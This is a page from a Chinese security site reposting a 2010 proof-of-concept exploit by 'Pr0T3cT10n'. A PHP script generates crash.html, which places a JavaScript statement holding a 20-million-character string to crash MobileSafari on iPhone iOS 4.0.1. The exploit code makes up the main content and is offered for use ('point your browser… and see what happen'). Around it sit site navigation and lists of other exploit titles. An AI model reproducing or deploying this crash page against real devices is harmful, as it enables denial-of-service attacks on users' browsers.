首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple iPhone Safari (JS .) Remote Crash
来源:inv0ked.israel@gmail.com 作者:Pr0T3cT10n 发布时间:2010-12-23  
<?php
#     _             ____  __            __    ___
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/ 
#                   Live by the byte     |_/_/ 
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# The following code is a proof of concept for a crash vulnerability that exists in 'Apple iPhone MobileSafari'.
# Point your browser to the created file (crash.html) and see what happen ;)
# The vulnerable function is:
# * . = "A X 20000120";
# -----------------------------------
# Exploit Title: Apple iPhone Safari (JS '.' / dot) Remote Crash
# Date: 21/12/2010
# Author: Pr0T3cT10n
# Affected Version: IOS 4.0.1
# Tested on Apple iPhone 3GS, IOS 4.0.1, MobileSafari
# Launch Safari, point your browser to the page and safari will crash.
# ISRAEL, NULLBYTE.ORG.IL
$string = str_repeat('A', 20000120);
$code  = "<html>
 <head>
  <title>Apple iPhone 3 Safari (JavaScript - dot / '.') Remote Crash</title>
 </head>
 <script type='text/javascript'>
  . = '{$string}';
 </script>
</html>";
if(file_put_contents("./crash.html", $code)) {
 echo("Point your safari mobile browser to `crash.html`.\r\n");
} else {
 echo("Cannot create file.\r\n");
}
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Citrix Access Gateway Command
·WMITools ActiveX Remote Comman
·Windows 7 IIS7.5 FTPSVC UNAUTH
·DorsaCms SQL Injection Vulnera
·Apple iPhone Safari (decodeURI
·Microsoft WMI Administration T
·Internet Explorer CSS Recursiv
·Mitel Audio and Web Conferenci
·Apple iPhone Safari (decodeURI
·HttpBlitz Web Server Denial Of
·Apple iPhone Safari (body alin
·Kolibri v2.0 Buffer Overflow R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved